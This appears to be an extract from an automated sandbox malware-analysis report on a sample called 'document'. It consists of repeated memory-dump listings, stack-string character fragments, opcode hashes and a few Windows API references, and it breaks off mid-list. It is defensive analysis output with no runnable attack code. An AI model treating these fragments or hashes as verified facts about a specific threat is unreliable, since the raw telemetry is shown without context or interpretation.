                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: #$3$5$6$6$7$>$>$B$H$J$]$`$a$a$a$a$a$a$a$a$agy$b$b$c$c$d$d$d$d$d$e$e$e$e$e$e$e$e$e$e$e$e$e$e$eroon$g$g$g$g$g$gibor$h$h$h$h$h$h$herej$i$i$i$i$i$i$irdor$k$k$l$l$l$l$l$l$lybor$m$m$m$n$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$o$o$o$o$p$p$q$r$r$r$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$t$t$t$t$u$w$w$w$y$z$z
                                                                  • API String ID: 0-226567699
                                                                  • Opcode ID: 5bf2394e186fa3740055896f63d422ae9df793a170122944e5eb4f5801406b64
                                                                  • Instruction ID: 897faa67981242d41c61dfb40b62df43763f7642aa4407e7da9ffeee02b4687e
                                                                  • Opcode Fuzzy Hash: 5bf2394e186fa3740055896f63d422ae9df793a170122944e5eb4f5801406b64
                                                                  • Instruction Fuzzy Hash: 36929F2400D7C189E332C72884587DFBFD25BA6718F488E9ED4ED1B292C6BA0159C767
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: #$5$6$6$7$>$>$B$J$]$`$a$a$a$a$a$a$a$a$agy$b$b$c$c$d$d$d$d$d$e$e$e$e$e$e$e$e$e$e$e$e$e$e$eroon$g$g$g$g$g$gibor$h$h$h$h$h$h$herej$i$i$i$i$i$i$irdor$k$k$l$l$l$l$l$l$lybor$m$m$m$n$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$o$o$o$o$p$p$q$r$r$r$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$t$t$t$t$u$w$w$w$y$z$z
                                                                  • API String ID: 0-1314068085
                                                                  • Opcode ID: 0d3d9c16a7e67113e3b9701a0b24be30b96c2e0d1d52f6ef8f0a9078a67e094f
                                                                  • Instruction ID: 9d4485feb2a8a036b1cfc007295b7909a2e3c490d21ab14ed2397911ff3ccdd3
                                                                  • Opcode Fuzzy Hash: 0d3d9c16a7e67113e3b9701a0b24be30b96c2e0d1d52f6ef8f0a9078a67e094f
                                                                  • Instruction Fuzzy Hash: 02829E2450D7C189E332C7288458BDFBFD25BE6718F488E9EC4DD1B292C6BA0259C767
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick
                                                                  • String ID: #$5$6$6$7$>$>$B$]$`$a$a$a$a$a$a$a$a$agy$b$b$c$c$d$d$d$d$d$e$e$e$e$e$e$e$e$e$e$e$e$e$e$eroon$g$g$g$g$g$gibor$h$h$h$h$h$h$herej$i$i$i$i$i$i$irdor$k$k$l$l$l$l$l$l$lybor$m$m$m$n$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$o$o$o$o$p$p$q$r$r$r$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$t$t$t$t$u$w$w$w$y$z$z
                                                                  • API String ID: 536389180-3007975938
                                                                  • Opcode ID: 8ee9640c17f91ccb7d287c1752a923c24f15c941b78ca902b81a0f24a1e0ded3
                                                                  • Instruction ID: 3eef77c2757c53a506e9ba4930021fd98a878e4b0ac0346694406f782fac75c3
                                                                  • Opcode Fuzzy Hash: 8ee9640c17f91ccb7d287c1752a923c24f15c941b78ca902b81a0f24a1e0ded3
                                                                  • Instruction Fuzzy Hash: AE729D2054D7C189E332C72884587DFBFD26BE6718F488E9ED4DD1B292C6BA0258C767
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: !$!$($,$,$3$6$<$@$A$A$B$C$I$Ljq$N$O$S$W$W$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$b$b$b$c$c$c$d$d$d$d$d$d$d$d$dualc$e$e$e$e$e$e$e$e$f$fna$g$g$h$h$hyb$i$i$i$j$j$j$j$l$l$l$l$lmada$m$m$n$n$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$q$r$r$r$r$r$r$rebyc$s$s$s$s$s$s$t$t$t$u$x$]$y$y$y
                                                                  • API String ID: 0-398216896
                                                                  • Opcode ID: 61968711493c94afcf7b2d208f4ce372754da47d982c7ba6b8816e6091b8bd33
                                                                  • Instruction ID: 783009e22913d8b145aff4382d8fc585394a81b2b82b9b90aaca791fecb38a32
                                                                  • Opcode Fuzzy Hash: 61968711493c94afcf7b2d208f4ce372754da47d982c7ba6b8816e6091b8bd33
                                                                  • Instruction Fuzzy Hash: 00A2CF2000D7C189E332C77894547DFBFD11BA6318F489E9ED4ED6A292C6BA0259CB77
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: !$!$($,$,$3$6$<$@$A$A$B$C$I$Ljq$N$O$S$W$W$a$a$a$a$a$a$a$a$a$a$b$c$c$d$d$d$dualc$e$e$e$e$f$fna$g$h$h$hyb$i$j$j$j$j$l$l$l$l$lmada$m$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$q$r$r$r$r$rebyc$s$s$s$s$s$s$t$t$u$x$]$y$y
                                                                  • API String ID: 0-1246891121
                                                                  • Opcode ID: 43c16ada332a8dd709468707ff4d6f0fce7f85d4f85c0fd8587031f39c8da794
                                                                  • Instruction ID: a28a096e937e9de4dcdb39462e473e9428d52a79a1e09a05438f9163ff59b36a
                                                                  • Opcode Fuzzy Hash: 43c16ada332a8dd709468707ff4d6f0fce7f85d4f85c0fd8587031f39c8da794
                                                                  • Instruction Fuzzy Hash: 0192C02400D7C18AE332CB7894547DFFFD15BA6318F489E9EC4ED6A292C6B60149CB67
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: "$$$'$*$8$>$D$E$I$b$b$b$c$d$d$f$g$g$h$h$h$h$h$h$i$i$l$l$m$m$m$m$n$o$o$o$p$p$p$p$q$r$s$s$s$s$s$s$t$t$t$t$t$t$t$t$u$v$w$z${
                                                                  • API String ID: 0-1889039134
                                                                  • Opcode ID: 8a5a3c4c6769900c5574127e7be7bd684675318f2718d754a9158b27d764485c
                                                                  • Instruction ID: d93a35099a26fe614cb1a3d73480c0d45d8b3759dc0d557f6e2bb2caa7de7eb8
                                                                  • Opcode Fuzzy Hash: 8a5a3c4c6769900c5574127e7be7bd684675318f2718d754a9158b27d764485c
                                                                  • Instruction Fuzzy Hash: 5C12E82540D7C1CDD322CB28945478FFFD15FA6618F489E9EE1E847392D2BA8209CB67
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $!$"$"$#$#$$$&$&$'$)$)$*$+$-$.$.$2$4$4$5$7$9$9$:$:$;$;$?$@$B$C$D$E$E$E$F$H$I$I$J$K$K$L$L$O$O$P$P$T$T$V$V$Z$Z$Z$[$[$\$]$^$^$_$_$`$c$d$d$d$d$g$h$i$j$l$n$o$p$r$s$t$t$u${${$}$}
                                                                  • API String ID: 0-3399755458
                                                                  • Opcode ID: bd7c04dccf065e1d88f6d9f7e92eaab3c2c44fac3a6ad3412f958f15279ef865
                                                                  • Instruction ID: 7bb5c3633d4d28a97bd5419e7888351cfa4f1d60291a9d888d1e89523d7a5470
                                                                  • Opcode Fuzzy Hash: bd7c04dccf065e1d88f6d9f7e92eaab3c2c44fac3a6ad3412f958f15279ef865
                                                                  • Instruction Fuzzy Hash: DDA2A13040C7C29AD336C63888587CBBFD46BA6324F588B9DD1ED4A2D2D675024AD767
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?,00000000), ref: 004164B1
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00000014), ref: 004164EB
                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000014), ref: 004164F2
                                                                  • lstrlenA.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00000014), ref: 0041654B
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004165E3
                                                                  • HeapFree.KERNEL32(00000000), ref: 004165EA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Processlstrlen$AllocFree
                                                                  • String ID: "$#$&$'$'$.$.$/$0$2$3$4$6$7$7$7$9$:$:$>$?$?$A$F$G$I$M$M$M$N$O$S$T$U$U$Y$\$\$]$]$^$a$a$b$c$c$d$d$f$g$h$i$k$l$n$n$n$p$p$s$v$z${${$|$~
                                                                  • API String ID: 2204526134-88862724
                                                                  • Opcode ID: 35d8601f16750b3f0a8b14371d56d770c5ec2ac2de7b2246bbd6a7e197c30585
                                                                  • Instruction ID: d3d8d2549f7682fd1551bd31a31a6895d5c84ed4d1ce20b04fc8ae49b41e83c9
                                                                  • Opcode Fuzzy Hash: 35d8601f16750b3f0a8b14371d56d770c5ec2ac2de7b2246bbd6a7e197c30585
                                                                  • Instruction Fuzzy Hash: D8622A2110D7C189D322CB3C985868FBFD51BA7218F585E9DF5E44B3E3C2AA8249C767
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: !$!$($,$,$3$6$<$A$B$C$I$Ljq$O$S$a$a$a$a$a$a$a$a$a$a$b$c$c$d$d$d$dualc$e$e$e$f$fna$g$h$h$hyb$i$j$j$j$l$l$l$lmada$m$n$n$n$n$n$n$n$n$n$o$o$o$o$q$r$r$r$r$rebyc$s$s$s$s$t$t$u$x$]$y
                                                                  • API String ID: 0-3286634472
                                                                  • Opcode ID: bd6bb27d60141563e35dc989fdf8730712766b0b72a44616c1c7e8647056d585
                                                                  • Instruction ID: 214f063a2eaa7479a4200d3698902748cf37a85b794205f16bdb65cf0bbf3bb2
                                                                  • Opcode Fuzzy Hash: bd6bb27d60141563e35dc989fdf8730712766b0b72a44616c1c7e8647056d585
                                                                  • Instruction Fuzzy Hash: C862AF2400D7C18AE332CB7894547DFFFD15BA6308F089EAED4DD6A292C6B60159CB67
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $!$"$"$#$$$&$&$'$)$*$+$-$.$.$2$4$5$7$9$9$:$:$;$;$?$@$B$C$D$E$E$E$F$H$I$I$J$K$L$L$O$O$P$P$T$V$V$Z$[$\$]$^$^$_$_$`$c$d$d$d$d$g$h$j$l$o$p$r$s$t$u${${$}$}
                                                                  • API String ID: 0-3967217698
                                                                  • Opcode ID: ffa1e3fc69652a11b1a6c6df878d9b27e8738cfaffb22d8a44fe04aed7599e5e
                                                                  • Instruction ID: c25c44ad86f806f1bc6481ccfacf67464102ede46037e78e9a54b81988712fa8
                                                                  • Opcode Fuzzy Hash: ffa1e3fc69652a11b1a6c6df878d9b27e8738cfaffb22d8a44fe04aed7599e5e
                                                                  • Instruction Fuzzy Hash: 6A82A03040C7C29AD376CA3884487CBBFD56BE6324F488B9DD1ED4A2D2DA75024AD767
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $&$($2$3$4$<$H$K$N$R$U$V$W$]$_$a$a$a$b$bewrd$d$d$d$d$d$e$e$e$edippugvawpubewrd$f$g$g$i$j$j$k$k$l$m$m$m$n$n$o$p$p$p$r$r$r$u$u$v$v$v$v$w$w$|$}
                                                                  • API String ID: 0-3024838208
                                                                  • Opcode ID: 2a9d7a6043b61eb5a444d87ebce2f5865ace6771c7c66fe5ec91156bfd5689eb
                                                                  • Instruction ID: dfcb897c3c3ddb5f64d256e8bd4ce8caa9f1c39f7f70016a84696abcb0595acb
                                                                  • Opcode Fuzzy Hash: 2a9d7a6043b61eb5a444d87ebce2f5865ace6771c7c66fe5ec91156bfd5689eb
                                                                  • Instruction Fuzzy Hash: EA12BE2010D7C18DE322C678945479FFFD11BA7618F484A9EE1E85B393D6BA8109CB77
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $ $ $%$&$*$0$1$6$6$;$<$<$A$Ax`B$B$E$G$H$I$K$L$N$O$R$S$X$[$`$a$c$c$d$d$d$d$l$l$m$m$o$o$o$o$o$p$r$r$r$r$s$x$x$y$y${O
                                                                  • API String ID: 0-2256030295
                                                                  • Opcode ID: da0bcaadc6d3e6a73930e08e3bb51312d0306c4b7cb00b51c7135d2fd64d93b4
                                                                  • Instruction ID: 43956b3c6462715040061548aa2c3e0b9dcfe60922f62804308211c4145eee04
                                                                  • Opcode Fuzzy Hash: da0bcaadc6d3e6a73930e08e3bb51312d0306c4b7cb00b51c7135d2fd64d93b4
                                                                  • Instruction Fuzzy Hash: C312C02010D7C18DD362867C949878FFFD11BE7228F585A9DF1E84A3E3C2AA8149C767
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
